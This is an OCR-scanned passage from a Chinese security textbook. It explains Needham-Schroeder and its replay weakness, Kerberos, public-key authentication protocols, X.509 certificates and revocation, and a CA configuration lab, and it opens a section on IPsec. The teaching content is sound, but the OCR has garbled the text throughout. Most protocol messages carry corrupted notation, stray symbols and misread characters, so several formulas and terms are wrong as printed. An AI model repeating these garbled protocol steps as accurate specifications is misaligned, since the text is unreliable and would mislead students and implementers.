列 号 。 这 时 ,就 要 求 每 一 个 通信 实体 都 记录 与 其 他 实体 交换 信息 的 报 文 序列 号 ,以 便 对 新 收 
到 的 报 文 进行 检验 。 这 种 做 法 大 大 增加 了 用 户 的 负担 ,一 般 不 使 用 在 认证 和 密 钥 交 换 中 。 
在 认证 和 密 钥 交 换 中 常用 的 方法 是 时 间 戳 方法 和 询问 -应 答 方 法 。 时 间 截 方法 适合 在 无 连 
接 的 通信 中 使 用 ,而 询问 -应 等 方法 适合 在 面向 连接 的 通信 中 使 用 。 


2.4.1 单 钥 加 密 认 证 协议 


1. 相互 认证 协议 Needham-Schroeder 


如 1.4.2 节 所 述 ,在 使 用 单 钥 加 密 体 制 的 系统 中 ,普遍 使 用 的 密 钥 分 配方 法 是 图 1. 10 
去 这 村 志 


所 采用 的 过 程 。 采 用 这 种 方法 进行 密 钥 分 配 , 需 要 一 个 可 信 的 KDC, 并 且 每 一 个 通信 实体 
都 与 KDC 有 一 个 共享 的 主 密 钥 。 

图 1. 10 所 采用 的 密 钥 分 配 过 程 可 以 用 下 面 的 协议 描述 : 

@ A 一 KDC: ID | IDs 上 Ni(A 请 求 与 B 加 密 通 信 )。 

© KDC>A: Ex, [Ks | IDs | Ni || Ex, [Ks | IDA]](A 获得 Ks)。 

@ A 一 B: Eu [Ks | IDa](B 安全 地 获得 Ks)。 

@ B-~A: Ek.[N,](B 知道 A 已 掌握 Ks, 用 加 密 N, 向 A 示意 自己 也 获得 Ks)。 

© A™>PB. Ex Lf(N;,)]。 

这 个 协议 称 为 Needham-Schroeder 协议 。 在 这 个 协议 中 ,第 由 、@ 两 步 是 一 个 握手 过 
程 。 当 在 第 @ 步 中 B 能 正确 收 到 自己 在 第 @ 步 发 出 的 N; 时 ,就 可 以 证 明 自己 在 第 @ 步 获 
得 的 Ks 是 新 鲜 的 ,而 非 前 一 次 执行 协议 时 截获 的 Ks 的 重 放 。 但 是 ,车 攻击 者 已 经 获得 旧 会 
话 密 钥 Ks ,并 冒充 A 向 B 重 放 第 @ 步 的 消息 ,就 可 以 欺骗 B 使 用 旧 Ks 会 话 ,接着 截获 第 @ 
步 B 的 询问 ,再 冒充 A 对 B 应 答 。 这 样 就 能 冒充 A 向 B 发 送 假 消息 。 

改进 的 办 法 是 在 @ .四 中 加 上 一 个 时 间 戳 , 即 

© KDC—>A: Ex, [Ks | IDs | TI Ex [Ks || IDs | T]]. 

©® A 一 B， Er, [Ks | IDs || TJ。 

这 样 ,A 和 B 都 可 以 利用 当前 时 间 对 工 进行 检查 ,以 确定 Ks 是 否 陈 旧 。 但 是 ,使 用 这 
个 协议 的 前 提 是 A 和 B 的 时 钟 完全 同步 。 若 由 于 系统 故障 或 存在 计时 误差 ,就 会 被 攻击 者 
利用 时 间 差 进行 重 放 攻击 。 克 服 这 一 缺陷 的 方法 ,是 将 Needham-Schroeder 协议 进一步 改 
进 为 ， 

© A—B: ID | NA。 

© BKDC: IDs | Na | Ex, [LIDA | NA | Ts]。 

©® KDC~~A: Ex, [IDs | NA | Ks | IDA | Ts] | Ex, [IDA | Ks | Ts] | Na。 

@ A 一 B， Er, [IDA | Ks | Ta] | Er [LNs]。 

这 个 协议 的 执行 过 程 如 图 2. 11 所 示 。 


Ss 
出 
图 2.11 进一步 改进 的 Needham-Schroeder 协议 


分 析 这 个 进一步 改进 的 Needham-Schroeder 协议 可 以 看 出 : 

。 在 第 四 步 中 ,A 将 IDA 和 NA 以 明文 传送 给 B; 在 第 四 步 中 ,B 用 自己 和 KDC 共享 的 
主 密 钥 对 IDA 和 Na 加密 传送 给 KDC; 在 第 @ 步 中 ,KDC 对 从 B 传 来 的 信息 解密 ,再 
用 KDC 与 A 共享 的 主 密 钥 , 将 Ks 和 Ns 一 同 加 密 传 回 A。A 验证 了 NA 就 可 以 知 
道 ,B 已 经 收 到 了 A 在 第 四 步 中 发 送 的 消息 ,同时 也 确信 Ks 是 新 鲜 的 。 

。 在 第 @ 步 中 ,B 将 IDs 和 Ns 以 明文 传送 给 KDC, 经 第 @ 步 由 KDC 将 Ns 传送 给 A， 
再 由 A 用 .加密 Ns 将 传 回 B。 同 NA 的 作用 一 样 , Ns 用 来 保证 B 收 到 的 Ks 是 新 
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鲜 的 。 
在 第 思 步 中 ,B 发 出 的 Ts 是 B 建议 的 证 书 截止 时 间 , 它 是 B 根据 自己 的 时 钟 确定 
的 ,不 要 求 各 方 之 间 同 步 。 
Erks[IDA | NA | Ta] 经 KDC 传送 给 A, 由 A 留 作 以 后 认证 的 证 据 , 并 可 以 在 有 效 时 
间 范 围 内 ,不 借助 认证 服务 器 (KDC) 而 是 通过 以 下 几 步 实现 双方 的 新 认证 : 

© A—B: Ex, [LIDa | Ks | Ts], NA 

© B>A: Ns,ErLNA]。 

@ A>B: Ex, [Ns]。 

这 里 ,B 通过 Ts 检验 证 据 是 否 过 时 ,而 新 产生 的 随机 数 NA 和 Ns 可 以 用 来 保证 没有 重 
放 攻 击 。 


2. 单 向 认证 协议 


对 于 单 向 保密 通信 特点 ,在 Needham-Schroeder 协议 中 去 掉 第 @ 步 和 第 @ 步 ,就 成 为 能 
满足 单 向 通信 两 个 基本 要 求 的 单 向 认证 协议 : 

© A—KDC: IDA || IDs || Ni 

© KDC—>A: Ex, [Ks | IDs | Ni | Ex, LKs | IDA]]。 

©@ A 一 B: Er, [Ks | IDA] | Er, [MjJ。 

这 个 协议 提供 了 对 于 发 送 方 A 的 认证 ,也 保证 了 只 有 B 才能 阅读 报 文 ,但 是 , 它 不 能 防 
止 重 放 攻击 。 为 此 ,可 以 使 用 时 间 截 。 不 过 由 于 电子 邮件 处 理 的 延迟 性 ,时 间 戳 的 作用 
有 限 。 


2.4.2 Kerberos 认证 系统 


Kerberos 是 MIT( 麻 省 理工 学 院 ) 采 用 Needham-Schroeder 协议 的 认证 系统 ,其 设计 目 
标 是 为 分 布 式 计算 环境 下 提供 的 一 种 对 用 户 双方 进行 验证 : 在 开放 的 分 布 式 环境 中 ,用 户 
希望 访问 网 络 中 的 服务 器 ,而 服务 器 则 要 求 能 够 认证 用 户 的 访问 请 求 并 只 允许 通过 了 认证 
的 用 户 访 问 服务 器 ,以 防止 未 授权 用 户 得 到 服务 和 数据 。 

Kerberos 系统 已 经 有 5 个 版 本 。 其 中 V1 一 V3 是 内 部 开发 版 ,V4 是 1988 年 开发 的 ， 
目前 已 经 得 到 广泛 应 用 。V5 是 针对 V4 的 安全 缺陷 的 改进 版 ,已 经 于 1994 年 作为 Internet 
标准 (草案 ) 公 布 (RFC 1510)。 


1。Kerberos 系统 工作 概要 


Greek Kerberos 是 希腊 神话 中 的 一 种 有 3 个 脑袋 的 地 狱 守 门 狗 。 作 为 认证 系统 的 
Kerberos 也 被 其 开发 者 塑造 成 具有 3 个 头 的 网 络 大 门 的 守护 者 。 这 时 的 3 个 “ 头 ” 为 认证 
(Authentication)、 计 费 (Accounting)、 审 计 (Audit) 。 

Kerberos 针对 客户 访问 服务 器 时 可 能 出 现 的 威胁 ,实现 了 一 个 没有 经 过 验证 的 用 户 不 
能 访问 服务 器 的 目标 。 这 些 威胁 是 : 

。 一 个 用 户 可 能 扮演 另 一 个 用 户 访问 特殊 的 服务 器 。 
。 用 户 可 能 改变 服务 器 的 网 络 地 址 。 
。72 。 


。 用 户 可 能 使 用 重 放 方式 攻击 服务 器 ,或 中 断 服务 器 的 操作 。 

为 此 ,Kerberos 提供 了 一 个 集中 验证 功能 的 服务 器 ,用 于 验证 每 一 个 访问 服务 器 的 用 
户 和 访问 用 户 的 服务 器 。 这 就 是 安全 (认证 ) 服 务 器 (authentication server,AS) 。 

Kerberos 采用 对 称 密 钥 加 密 算法 来 实现 通过 可 信 第 3 方 KDC 的 身份 验证 。 因 此 , 它 
有 3 个 通信 参与 方 : 需要 验证 身份 的 通信 双方 和 一 个 双方 都 信任 的 第 三 方 一 一 KDC。 当 某 
个 网 络 应 用 进程 需要 访问 一 个 服务 进程 ,例如 用 户 进程 要 向 远程 FTP 服务 器 发 起 FTP 连 
接 时 ,首先 要 向 FTP 服务 器 提交 自己 的 身份 供 验证 ,同时 也 要 确认 FTP 服务 器 的 身份 ,从 
而 构成 一 个 双向 身份 验证 。 在 Kerberos 中 ,在 某 一 段 时 间 内 通信 双方 提交 给 对 方 的 身份 
“凭证 ”(ticket) 是 由 KDC 生成 的 。 该 凭证 中 包含 如 下 内 容 : 

。 客户 方 和 服务 器 方 的 身份 信息 。 

。 下 一 阶段 通信 双方 使 用 的 临时 加 密 密 钥 一 一 会 话 密 钥 (session key)。 

。 证 明 客 户 方 拥有 会 话 密 钥 的 身份 认证 者 (authenticator) 信 息 一 一 防止 攻击 者 再 次 使 

用 同一 凭证 。 

。 时 间 标 记 (timestamp) ,以 检测 重 放 攻 击 (replay attack) 。 

为 了 提高 安全 性 能 ,一 个 Kerberos 凭证 只 在 一 段 有 限时 间 , 即 凭证 的 生命 期 内 有 效 。 
生命 期 过 后 ,凭证 自动 失效 ,以 后 通信 必须 从 KDC 那里 重新 获得 凭证 。 

Kerberos 持 有 一 个 客户 方 以 及 密 钥 的 数据 库 。 这 些 密 钥 由 KDC 与 客户 方 共享 ,而 且 
不 能 被 第 三 方 知道 。 如 果 客 户 是 用 户 ,该 密 钥 就 是 用 户口 令 经 过 杂凑 函数 生成 的 。 


2. Kerberos 系统 工作 原理 


如 图 2. 12 所 示 ,Kerberos 系统 由 3 个 重要 部 件 组 成 : 中 心 数据 库 、 安 全 (认证 ?服务 器 
(authentication server,AS) 和 凭证 许可 服务 器 (ticketrgranting server,TGS)。 这 3 个 部 件 
都 安装 在 相对 安全 的 主机 上 。 


(0 Kerberos 系统 
[ 加 一 一 ® 
© 用 户 C S 
服务 器 V 硬 


图 2. 12 Kerberos 系统 工作 原理 


因此 ,Kerberos 系统 的 3 个 部 件 的 功能 为 : 

(1) 中 心 数据 库 

中 心 数 据 库 是 一 个 由 KDC 维护 的 数据 库 , 主 要 保存 : 

。 用 户 账户 信息 ,包括 用 户 注册 名 、 相 关口 令 ; 

。 网 络 上 所 有 工作 站 和 服务 器 的 网 络 地 址 ; 

。 服务 器 密 钥 及 存 取 控 制 表 等 。 

(2) 安全 (认证 ) 服 务 器 AS 

当 一 个 用 户 登 录 到 一 个 企业 内 部 网 请 求 访问 内 部 服务 器 时 ,AS 将 根据 中 心 数据 库存 


下 这 和 


储 的 用 户 密 码 生成 一 个 DES 加 密 密 钥 ,对 一 个 人 场 券 (ticketres ) 进 行 加 密 。 


提供 给 TGS 的 。 
(3) 入 场 券 许可 服务 器 TGS 


这 个 入 场 券 是 


当 用 户 要 访问 某 个 服务 器 V 时 ,TGS 就 会 查找 中 心 数据 库 中 的 存 取 控制 表 , 以 确认 该 
用 户 是 否 已 经 授权 使 用 该 服务 器 。 确 认 后 ,会 生成 一 个 新 的 凭证 (ticketv ,相当 于 手 牌 )。 这 


个 新 的 凭证 包含 与 服务 器 相关 的 密 钥 和 加 密 后 的 入 场 券 (ticketrcs)。 
3. Kerberos 系统 认证 需要 的 信息 


(1) 在 认证 过 程 中 要 使 用 的 身份 识别 码 
。 IDc: 客户 身份 ; 

。 IDrcs: TGS 身份 ; 

. IDv : 服务 器 身份 。 

(2) 在 认证 过 程 中 要 使 用 的 密 钥 

。 天 crcs: C 与 TGS 共享 ; 

。 Kasss AS 与 TGS 共享 ; 

。Kc:C 与 AS 共享 ,由 C 上 的 用 户口 令 导出 的 ; 
。 Kv: TGS 与 V 共享 ; 

。 Kev: C 与 V 共享。 

(3) 在 认证 过 程 中 要 使 用 的 一 些 数据 
。 Pc: C 上 的 用 户口 令 ; 

。 ADc: C 的 网 络 地 址 ; 

。 TS;: 第 ;个 时 间 截 ; 

。 lifetime; : 第 i 个 有 效 期 间 。 


4. Kerberos 系统 的 认证 过 程 


如 图 2. 16 所 示 , Kerberos 系统 的 认证 过 程 分 为 3 个 阶段 6 步 实现 。 
(1) 认证 服务 交换 ,用户 从 AS 取得 入 场 券 
@ 客户 向 AS 发 出 访问 TGS 请 求 (用 TS 表示 是 新 请 求 ): 
C=>5: IDc | IDares || Ts， 
@ AS 向 C 发 出 应 答 : 
AS—C: Er. [Ke,res || IDres || TS; || lifetimezs || Ticketres ] 
其 中 


Ticketrcs 一 Ex,s LKe,res | IDc | ADc | IDrcs | TS; | lifetimes ] 


(2) 入 场 券 许可 服务 交换 ,用 户 从 TGS 获取 服务 许可 和 凭证 
@ C 向 TGS 发 出 请 求 ,内 容 包 括 服务 器 识别 码 、 入 场 券 和 一 个 认证 符 : 
C—>TGS: IDv | Ticketrcs || Authenticatorv 
其 中 
0. 


Ticketres = Exi,s [Ke,res | IDc ‖ ADpe || IDres | TS, | lifetime; ] 
Authenticatorv = Ex ios LIDe || ADc || TS; ] 
@ TGS 经 验证 向 C 发 出 服务 许可 凭证 
TGS 一 C: Ex, ios LKe.res | IDc || ADc || IDres || TS; | lifetime; ] 
中 


y 


Ticketv =Ex, [Ke,v | IDc || ADe || IDy || TS, || lifetime, ] 
(3) 客户 -服务 器 相互 认证 交换 ,用 户 从 服务 器 获取 服务 
@ C 向 服务 器 证 明 自 己 身 份 (用 Ticketv 和 Authenticatorv ) 

C—>V: Ticketv || Authenticatorv 

其 中 

Ticketv 一 Ek,[Kcv | IDe | ADpe || IDv | TS | lifetimes ] 

Authenticatory = Ek. v ED | ADBs | TS] 
@ 服务 器 向 客户 证 明 自 己 身份 : 

VC: Ex.,[LTS;+1] 
这 个 过 程 结束 ,客户 C 与 服务 器 V 之 间 就 建立 了 共享 会 话 密 钥 ,以 便 以 后 进行 加 密 通 
信 或 交换 新 密 钥 。 


2.4.3 公 钥 加 密 认 证 协议 

公 钥 加 密 认 证 协议 是 基于 公 钥 加 密 体制 分 配 会 话 密 钥 过程 实 现 的 。 下 面 介 绍 几 种 认证 
协议 。 

1. 相互 认证 协议 


(1) 一 个 通过 认证 服务 器 AS 的 认证 协议 

© A-~~AS: IDA | IDe。 

© AS-~A: Esx,s LIDa | PKA | TJ | Esx,s LIDs | PKs | TJ]。 

©® A>B: Esx,s LIDs || PKA | TI Esx,s LIDs || PKs | T | Erx, LEsx, LKs | TJ. 

这 个 协议 需要 各 方 时 钟 同步 。 

(2) 一 个 通过 KDC 的 认证 协议 

© A-~~KDC: ID | IDa。 

@ KDC>A: FEsku[LIDa | PKs](SKAo 是 KDC 的 私 钥 ) 。 

@ A 一 B: Erx, [Na | IDs](CNA 是 A 选择 的 一 次 性 随机 数 ) 。 

@ B>KDC: IDs | IDA |‖ Erx,, [LNa](PKau 是 KDC 的 公 钥 ) 。 

© KDC-~B: Esku[IDA | PKA] | Eee [Esku[NA | Ks | IDsJJ(Ks 是 KDC 为 A.B 分 
配 的 一 次 性 会 话 密 钥 ) 。 

© B>A: 下 pk [LEsk su LNA | Ks | IDs] || Na]。 

© A>B: Eks[Ne]。 

这 个 协议 中 使 用 了 一 次 性 随机 数 , 所 以 不 再 要 求 各 方 时 钟 的 同步 。 但 是 ,这 个 协议 不 能 
抵御 攻击 者 对 A 的 假冒 。 请 读者 设法 为 此 改进 这 个 协议 。 
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2. 单 向 认证 协议 


简单 地 说 ,认证 协议 主要 有 两 种 作用 : 提供 机 密 性 和 认证 性 。 在 公 钥 加 密 体制 中 ,这 些 
功能 要 看 是 否 为 对 方 提供 公 钥 。 
(1) 发 送 方 知道 接收 方 的 公 钥 , 才 可 能 有 机 密 性 保护 。 例 如 下 面 的 协议 仅 提 供 机 密 性 : 
A—B: Epr, LKs] | Er [LM] 
(2) 接收 方 知道 发 送 方 的 公 钥 , 才 可 能 有 认证 性 保护 。 例 如 下 面 的 协议 仅 提 供认 证 性 : 
A 一 B: AM | FEsk [五 COM)] 
这 时 ,为 了 使 BB 确信 A 的 公 钥 的 真实 性 ,A 还 要 向 B 发 送 公 钥 证 书 : 
A>B: M1 Esk, LH(CM)] | Esk,s LT 有 IDs | PKa](SKas 为 认证 服务 器 的 公 钥 ,Esk,, [TT 
| IDA 上 PKA] 是 AS 给 A 签署 的 公 钥 证 书 ) 。 
(3) 发 送 方 和 接收 方 互相 知道 对 方 的 公 钥 , 既 可 提供 机 密 性 又 可 提供 认证 性 ,例如 : 
A 一 B: Epr, LM | Esr, LHCM)]] 
这 时 ,为 了 使 BB 确信 A 的 公 钥 的 真实 性 ,A 还 要 向 B 发 送 公 钥 证 书 ， 
A 一 B: Eee [M | Esc [HOM)J] | Esx,s LTs || IDA || PKA] 


2.4.4 X.509 标准 


为 了 保障 数字 证 书 合理 获取 、 撤 出 和 验证 过 程 ,1988 年 ITU-T 发 表 了 X. 509 标准 。 这 
是 一 个 基于 公开 密 钥 和 数字 签名 的 标准 , 它 的 核心 是 数字 证 书 格式 和 认证 协议 。X. 509 作 
为 X. 500 目录 服务 的 一 部 分 ,定义 了 下 列 内 容 : 

。 定义 了 X.500 目录 ,向 用 户 提供 认证 业务 的 一 个 框架 ; 

。 证 书 格式 ; 
基于 公 钥 证 书 的 认证 协议 。 


1. X. 509 数字 证 书 格式 


X. 509 标准 的 核心 是 与 用 户 有 关 的 公开 密 钥 证 书 。 它 包含 如 下 域 : 

。 版 本 (version) : 区 分 X. 509 的 不 同 版 本 ,可 以 是 V1、V2 或 V3。 

。 序列 码 (serial number) : 某 个 CA 给 出 的 用 来 识别 证 书 的 唯一 编号 。 

。 签名 算法 识别 符 (algorithm parameters): CA 签署 证 书 所 用 的 公开 密 钥 算法 及 相应 
参数 。 

。 发 证 者 (issuer name) : 建立 和 签署 证 书 的 CA 的 名 称 。 

。 发 证 者 识别 码 (issuer unique identifier) : (可 选 ) 用 作 CA 的 唯一 标识 。 

。 主体 名 称 (subject name) : 密 钥 拥有 者 的 名 称 。 

。 主体 识别 码 (subject unique identifier) : (可 选 ) 用 作 密 钥 拥 有 者 的 唯一 标识 。 

。 公 和 钥 信 息 (algorithm parameters key) : 包括 主体 的 公 钥 .该 公 钥 的 使 用 算法 及 参数 。 

。 有 效 期 (not before not after) : 开始 时 间 和 终止 时 间 。 

扩充 域 (extensions): 包括 一 个 或 多 个 扩充 的 数据 域 , 仅 用 于 第 3 版。 

签名 (algorithm parameters encryption) : 此 域 是 CA 用 自己 的 秘密 密 钥 对 上 述 域 实 

中 区 


施 杂 凑 值 签名 的 结果 ,并 包括 签名 算法 标识 符 。 
图 2. 13 为 X. 509 v3 的 证 书 形式 。 


版 本 V3 
序列 号 1234567890 
签名 算法 标识 RSA 和 MIDS 
签发 者 c=CN,o=JAT-CA 
有 效 期 (起 始 日 期 ,结束 日 期 ) 06/06/06-08/08/08 
主体 c 一 CN,o 一 SX Cop,cn= Wang 
主体 公 钥 信息 (算法 ,参数 、 公 开 密 钥 ) | 56af8dc3a785d6ff4/RSA/SHA 
发 证 者 唯一 Value 
主体 唯一 标识 Value 
类 型 关键 程度 Value 
类 型 关键 程度 Value 
CA 的 数字 签名 


图 2.13 X.509 v3 的 证 书 形式 


X. 509 标准 使 用 了 下 面 的 描述 进行 证 书 定义 : 
CAZ<AS ==—CAMVSN ADCA Ts AA) 
其 中 ， 
。 了 二 =X 二 二 表示 证 书 发 放 机 构 Y 向 用 户 发 放 的 证 书 ; 
。 Y( 了 表示 I 链 接 上 YY 对 I 的 杂凑 值 签名 。 


2. 证 书目 录 


证 书 产生 之 后 ,必须 以 一 定 的 方式 存储 和 发 布 ,以 便于 使 用 。X. 509 标准 的 公开 密 钥 证 
书 由 CA 或 用 户 放 在 X. 500 目录 下 进行 集中 存储 和 管理 ,并 由 一 个 可 信赖 的 证 书 授权 系统 
CA 确认 。 在 证 书目 录 中 ,不 仅 存储 和 管理 用 户 证 书 , 还 存储 用 户 的 相关 信息 (如 电子 邮件 
地 址 、. 电 话 号 码 等 )。 由 于 证 书 的 非 保密 性 ,证 书目 录 也 是 非 保密 的 。 

在 标准 化 方面 ,目前 证 书目 录 广 泛 使 用 X. 500 标准 。X. 500 标准 目录 不 仅 可 以 对 证 书 
进行 集中 管理 ,还 可 以 管理 用 户 相 关 信 息 ,从 而 构成 一 个 用 户 信息 源 。 

为 了 便于 实际 应 用 ,在 Internet 环境 下 更 多 使 用 的 是 X. 500 标准 的 简化 和 改进 版 本 ， 
即 LDAP(lightweight directory access protocol ,轻型 目录 访问 协议 ) 。 


3. X. 509 证 书 的 层次 结构 


X. 500 目录 的 作用 是 存放 用 户 的 公 钥 证 书 。 由 于 证 书 不 能 伪造 ,它们 可 以 不 需要 特别 
的 保护 就 可 以 放 在 目录 里 。 现 在 的 问题 是 ,是 否 所 有 的 证 书 都 要 由 同一 个 CA 签署 。 
一 般 来 说 , 当 用 户 数目 较 多 时 , 仅 由 一 个 CA 为 所 有 用 户 签署 是 不 现实 的 。 因 为 这 样 ， 
区 -这 党 油 


需要 两 个 条 件 : 

。，CA 必须 取得 所 有 用 户 的 信任 ; 

。 每 一 个 用 户 必 须 以 绝对 可 靠 的 方式 通过 复制 获得 CA 的 公 钥 来 证 实 。 

显然 , 当 用 户 数目 较 多 时 ,应 当 由 多 个 CA 分 头 为 不 同 的 用 户 签署 证 书 。 但 是 ,简单 地 
由 多 个 CA 为 不 同 的 用 户 签署 证 书 , 也 有 一 些 问题 。 例 如 ,Xi 为 A 签署 了 一 个 证 书 ,X* 为 也 
签署 了 一 个 证 书 。 那 么 ,A 不 能 阅读 B 的 证 书 ,也 不 能 证 实 B 的 证 书 ;同样 ,B 不 能 阅读 A 
的 证 书 , 也 不 能 证 实 A 的 证 书 。 这 一 目录 结构 如 图 2. 14(a) 所 示 。 


人 > @® ©@® rs 
> @ @ ©@ 
Xi(A) X:(B》 XI(A)| | xs:《B》 
(a) 两 个 独立 的 CA (b) Xi 为 X, 签 署 证 书 bb 


图 2.14 多 CA 结构 


观察 图 2. 14(b) ,情况 就 不 同 了 : 
(1) A 可 以 从 此 目录 中 获得 Xi 签署 的 X* 的 证 书 。 由 于 A 确切 知道 Xi 的 公 钥 ,从 Xi 的 
证 书 中 就 可 以 获得 Xs 的 公 钥 ,并 利用 Xi 来 证 实 。 
(2) 进一步 A 能 获得 X* 签 署 的 B 的 证 书 , 并 可 以 用 已 经 获得 的 X; 的 公 钥 来 证 实 B 的 
数字 签名 ,安全 地 获得 B 的 公 
这 样 , 就 形成 了 证 书 链 。 其 中 ,A 获得 B 的 公 钥 的 证 书 链 , 在 X. 509 中 的 表示 为 
Xi《Xs Xa BY 
同 理 ,B 通过 反 向 链 也 可 以 获得 A 的 公 钥 ,其 结构 表示 为 
XX1 》XIK《A》 
这 样 证 书 链 形成 一 个 层次 结构 。X. 509 建议 将 所 有 的 CA 证 书 , 需 由 CA 放 在 目录 中 ， 
并 且 要 采用 层次 结构 。 图 2. 15 为 X. 509 层次 结构 的 一 个 例子 ,其 内 部 结 点 表示 CA, 叶 结 
点 表示 用 户 。 用 户 可 以 从 目录 中 沿 着 一 条 证 书 路 径 , 获 得 另 一 个 结 点 的 证 书 和 公 钥 。 例 如 ， 
A 获取 B 证 书 的 证 书 路 径 为 : 
XK WW VVE YY(2Z)Z(B) 


UW)Y > 


VU» 


VW) 
WhV) 


X《C》 C 


Z《B》 


图 2.15 X.509 层次 结构 的 一 个 例子 


二 


A 取得 这 些 证 书后 ,就 能 解密 其 证 书 路 径 ,获得 一 个 可 信 的 也 的 公 钥 。 
4. 用 户 证 书 的 吊销 


在 下 列 情形 下 ,应 当 将 用 户 证 书 吊销 : 

。 一 个 用 户 证 书 到 期 。 

。 用户 秘 密 密 钥 泄露 。 

。 CA 的 证 书 失窃 。 

。 CA 不 再 给 用 户 签发 证 书 。 

每 一 个 CA 必须 维护 一 个 证 书 吊 销 列表 (certificate revocation list, CRL)。CRL 中 列 
出 所 有 已 吊销 证 书 的 序列 号 和 吊销 日 期 。 


5. 认证 过 程 
为 了 适应 不 同 的 应 用 环境 ,X. 509 建议 了 3 个 验证 过 程 : 一 次 验证 过 程 、 二 次 验证 过 程 
和 三 次 验证 过 程 。 这 3 个 验证 过 程 都 是 使 用 公 钥 签名 技术 ,并 假定 通信 双方 都 认可 目录 服 


务 器 获得 对 方 的 公 角 证书, 或 对 方 最 初 发 来 的 报 文中 包括 公 钥 证 书 ( 即 双方 都 知道 对 方 的 公 
钥 )。 图 2. 16 为 3 个 验证 过 程 示 意图 。 


@) © A{frA, TA, B, SgnData, Epk, [Kap]} 


(a) 一 次 验证 


© Atra, Th, B, SgnData, Epk, [Kp]} 


(4) 回 Bi{Ts, ra, ra, SgnData, Epk [Kea]} (s) 


(b) 二 次 验证 


© AfrA, Ta, B, SgnData, Epk, [Kap]} 
BUT re, rn, SenData, Erx, [Kax 
@ 回 Atre} 
(0) 三 次 验证 
图 2.16 X.509 的 3 个 验证 过 程 


(1) 一 次 验证 


一 次 验证 也 称 单 向 验证 。 被 验证 者 A 产生 报 文 供 验证 者 B 验证 。 内 容 包 括 : 
。B: B 的 身份 。 


。 TA: 时 间 截 ,以 保证 报 文 的 新 鲜 性 。 其 中 可 以 包括 报 文 产生 的 时 间 ( 可 选 ) 和 截止 时 
间 ,以 处 理 报 文 传送 过 程 中 可 能 出 现 的 时 延 。 


*ra: 一 次 性 随机 数 ,防止 重 放 ;在 报 文 未 到 截止 时 间 前 是 唯一 的 ,以 拒绝 具有 相同 ra 
的 其 他 报 文 。 


如 果 仅 仅 为 了 验证 ,可 以 上 述 报 文 作为 凭证 ,否则 ,还 应 包括 下 列 内 容 : 


| 


。 A 用 自己 的 公 钥 签署 的 数字 签名 SgnData ,以 保证 信息 的 真实 性 和 完整 性 。 

。 由 也 的 公 钥 加 密 的 欲 建立 的 双方 会 话 密 钥 Kas。 

(2) 二 次 验证 

二 次 验证 也 称 双方 验证 , 即 A 不 仅 要 向 了 发 送 验证 凭证 信息 ,B 也 要 通过 应 答 以 证 明 : 

。B 的 身份 ; 

。 应 答 是 由 B 发 出 的 ; 

。 应 答 的 接收 者 是 A; 

。 应 答 报 文 是 完整 的 和 新 鲜 的 。 

(3) 三 次 验证 

三 次 验证 是 在 二 次 验证 完成 之 后 ,A 再 将 B 发 来 的 一 次 性 随机 数 签名 后 发 往 B。 这 样 
可 以 通过 检查 一 次 性 随机 数 就 可 以 得 知 是 否 有 重 放 ,而 不 需 检 查 时 间 戳 。 这 种 方法 主要 用 
在 通信 双方 无 法 建立 时 钟 同 步 的 情形 下 。 


实验 5 证 书 制作 及 CA 系统 配置 


1. 实验 目的 


(1) 深入 理解 PKI 系 统 的 工作 原理 。 

(2) 掌握 在 一 种 系统 中 配置 CA 系统 的 方法 。 
(3) 掌握 证 书 的 申请 及 制作 方法 。 

(4) 体会 SSL 的 作用 。 


2. 实验 内 容 

(1) 选择 一 个 系统 ,进行 CA 系统 的 配置 。 

(2) 为 服务 器 和 浏览 器 之 间 进 行 安全 通信 设置 。 

(3) 为 某 些 用 户 生 成 证 书 。 

(4) 测试 上 述 通信 的 安全 性 。 

3. 建议 环境 

(1) 利用 在 Windows 2000 Server 中 附加 的 认证 服务 器 ,进行 Windows 2000 PKI 系统 
的 配置 。 

(2) 利用 Linux 平台 上 的 SSL X. 509 或 FHS 进行 。 

4. 实验 准备 

(1) 收集 资料 ,设计 在 实验 用 系统 中 进行 CA 系统 配置 的 步 又。 

(2) 设计 在 实验 用 系统 中 进行 安全 通信 配置 的 步骤。 

(3) 设计 为 用 户 生成 证 书 的 方法 和 步骤 。 

(4) 设计 对 上 述 系 统 配置 进行 通信 安全 测试 的 方法 和 步骤 。 
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5. 推荐 的 分 析 讨 论 内 容 


(1) 你 知道 有 哪些 证 书 标准 ? 
(2) 你 知道 有 哪些 通信 安全 协议 ? 试 进行 比较 。 
(3) 其 他 发 现 或 想到 的 问题 。 


2.5 基于 认证 的 Internet 安全 


当初 ,TCP/IP 开发 的 目标 主要 有 两 点 : 互联 和 高 效 , 没 有 考虑 安全 问题 。 随 着 Inter- 
net 的 广泛 应 用 ,安全 问题 逐步 突出 。 为 了 解决 Internet 上 的 数据 安全 传输 问题 ,人 们 采用 
了 打 “ 补 丁 ” 的 办 法 : 一 块 补丁 打 在 IP 层 上 , 称 为 IPsec(IPsecurity) :一块 补丁 打 在 TCP 层 
与 应 用 层 之 间 , 称 为 SSL(secure socket layer, 安 全 套 接 层 ) 。 

它们 采用 了 现代 密码 学 方法 ,是 在 具体 环境 下 实现 机 密 性 保护 和 认证 性 服务 的 范例 。 


2.5.1 IPsec 


IPsec 是 由 IETEF 以 RFC 形式 公布 的 一 组 安全 IP 协议 集 , 是 在 IP 包 级 为 IP 业务 提供 
安全 保护 的 协议 标准 。 它 使 用 现代 密码 学 方法 ,支持 机 密 性 和 认证 性 服务 ,使 用 户 有 选择 地 
使 用 这 些 安 全 机 制 ,以 得 到 期 望 的 安全 服务 。 


1. JIP 安全 分 析 


IP 层 是 TCP/IP 中 的 关键 一 层 ,也 是 关系 整个 TCP/IP 安全 的 核心 和 基础 。 但 是 ,由 
于 当初 设计 时 的 环境 和 所 考虑 的 基本 出 发 点 .IP 没有 过 多 地 考虑 防卫 问题 ,只 是 设法 使 网 
络 能 够 方便 地 互通 互联 。 这 种 不 设防 政策 ,给 Internet 造成 许多 安全 隐患 和 漏洞 ,并 随 着 攻 
击 技术 的 提高 ,使 问题 的 严重 性 日 益 加 剧 。 下 面 举 几 个 例子 说 明 IP 遭受 的 安全 威胁 。 

(1) IPv4 缺乏 对 通信 双方 真实 身份 的 验证 能 力 ,仅仅 采用 基于 源 IP 地 址 的 可 认证 机 
制 , 并 且 由 于 IP 地 址 可 以 进行 软件 配置 。 这 样 ,就 给 攻击 者 以 可 乘 之 机 ,可 以 在 一 台 计 算 机 
上 假冒 另 一 台 计 算 机 向 接收 方 发 送 数据 包 ,而 接收 方 又 无 法 判断 接收 到 的 数据 包 的 真实 性 。 
